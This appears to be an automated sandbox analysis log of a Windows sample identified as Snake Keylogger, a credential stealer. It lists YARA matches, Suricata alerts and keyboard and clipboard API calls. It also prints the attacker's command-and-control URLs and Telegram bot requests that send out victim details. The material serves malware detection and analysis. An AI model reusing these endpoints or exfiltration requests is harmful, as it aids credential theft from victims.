                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global traffic | TCP traffic: 192.168.2.6:61842 -> 162.159.36.2:53
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:53:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:44:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                Source: Joe Sandbox View | IP Address: 149.154.167.220
                Source: Joe Sandbox View | IP Address: 104.21.32.1
                Source: Joe Sandbox View | IP Address: 132.226.247.73
                Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknown | DNS query: name: checkip.dyndns.org
                Source: unknown | DNS query: name: reallyfreegeoip.org
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49716 -> 132.226.247.73:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49734 -> 132.226.247.73:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49826 -> 132.226.247.73:80
                Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49845 -> 132.226.247.73:80
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49807 -> 104.21.32.1:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49794 -> 104.21.32.1:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 104.21.32.1:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49851 -> 104.21.32.1:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49841 -> 104.21.32.1:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49893 -> 104.21.32.1:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49740 -> 104.21.32.1:443
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49722 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49833 version: TLS 1.0
                Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_009522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009522EE
                Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 22:19:29 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 22:19:43 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000008.00000002.4592912814.0000000005B10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20a
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000008.00000002.4584508040.00000000026E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                Source: toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000008.00000002.4584508040.000000000270A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002714000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49811 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:61868 version: TLS 1.2
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00954164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00953F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0096CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B6CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                System Summary

                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware (Author: Florian Roth)
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking (Author: ditekSHen)
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware (Author: Florian Roth)
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking (Author: ditekSHen)
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware (Author: Florian Roth)
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking (Author: ditekSHen)
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware (Author: Florian Roth)
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking (Author: ditekSHen)
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware (Author: Florian Roth)
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking (Author: ditekSHen)
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware (Author: Florian Roth)
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking (Author: ditekSHen)
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware (Author: Florian Roth)
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking (Author: ditekSHen)
                Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown)
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_008E3B3A: This is a third-party compiled AutoIt script.
                Source: 6cicUo3f8g.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 6cicUo3f8g.exe, 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 6cicUo3f8g.exe, 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                Source: 6cicUo3f8g.exe, 00000000.00000003.2157994667.0000000004053000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 6cicUo3f8g.exe, 00000000.00000003.2157994667.0000000004053000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00AE3B3A: This is a third-party compiled AutoIt script.
                Source: toggeries.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: toggeries.exe, 00000002.00000002.2202161081.0000000000B94000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: toggeries.exe, 00000002.00000002.2202161081.0000000000B94000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                Source: toggeries.exe, 00000007.00000000.2308382196.0000000000B94000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: toggeries.exe, 00000007.00000000.2308382196.0000000000B94000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                Source: 6cicUo3f8g.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 6cicUo3f8g.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                Source: toggeries.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script.
